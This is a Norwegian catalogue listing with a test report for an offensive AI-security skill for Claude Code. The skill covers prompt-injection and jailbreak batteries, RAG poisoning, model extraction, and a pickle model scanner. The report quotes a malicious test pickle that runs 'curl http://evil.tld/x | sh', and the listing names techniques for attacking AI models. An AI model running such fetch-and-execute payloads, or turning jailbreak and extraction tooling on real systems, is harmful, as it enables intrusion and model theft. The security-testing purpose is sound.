AI Security

Offensiv testing av LLM/ML-systemer: prompt injection, RAG-forgiftning, pickle-modellskanning

av hypnguyen1209 · hypnguyen1209/offensive-claude

Bestått ★ 9.2/10

AI Security — Offensiv testing av LLM/ML-systemer: prompt injection, RAG-forgiftning, pickle-modellskanning

Hva den gjør

En offensiv sikkerhetsferdighet for red-teaming av AI/ML-systemer: prompt-injection og multi-turn jailbreak-batterier, RAG/vektor-DB-forgiftning, MCP/agent-verktøyforgiftningsrevisjoner, forhåndslasting av pickle-modell skanning for skadevare, og black-box modellutvinning/medlemskapsinferensprober, med OWASP LLM Top-10 og MITRE ATLAS-kartlegginger. Utløses når en bruker ber om å angripe, red-teame eller revidere en LLM, chatbot, RAG-pipeline, MCP-server eller en nedlastet modellartifakt. Leveres med fem kjørbare Python-skript pluss fem referanse-dykk knyttet til spesifikke 2024-2025 CVE-er.

Testrapport

Hentet skills/ai-security/SKILL.md og stikkprøvekontrollerte 3 medfølgende filer (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) — alle HTTP 200. For UTDATA kjørte jeg ferdighetens stdlib-only scripts/model_scan.py mot pickles jeg laget: en ondsinnet med __reduce__ -> os.system("curl http://evil.tld/x | sh"), en godartet, og en godartet hvis data kun inneholdt strengene "operating_system"/"subprocess". Grunnlinjen (naiv byte-grep) flagget den ondsinnete filen, men ga også FALSE-POSITIV for den godartede etikettliste-filen. Ferdigheten demonterte pickle-opkoder via pickletools, løste posix.system gjennom REDUCE-reachability som en nektet-liste-kallbar (strukturert JSONL: severity high, CWE-502, AML.T0011, exit code 2 som en CI-port), og ryddet korrekt begge godartede filer. Verifisert installasjon i en ren mktemp HOME plasserer SKILL.md på ~/.claude/skills/ai-security/SKILL.md.

Testet på: 2026-07-31 · Claude Code 2.x (agent harness)

Installer

git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src
mkdir -p ~/.claude/skills
cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security
# Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/).
# Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers;
#   promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint.
# Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone):
#   /plugin marketplace add hypnguyen1209/offensive-claude
#   /plugin install offensive-claude@offensive-claude-marketplace
# NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.

Kommandoer og eksempelprompter

  • /ai-securityOffensiv testing av LLM/ML-systemer: prompt injection, RAG-forgiftning, pickle-modellskanning

Skills utløses av vanlige forespørsler — ingen kommandoer å huske. Etter installasjonen aktiverer prompter som disse skillen (på engelsk):

  • Test this model against known jailbreak techniques
  • Check this RAG pipeline for vector poisoning
  • Run a model extraction attack against this API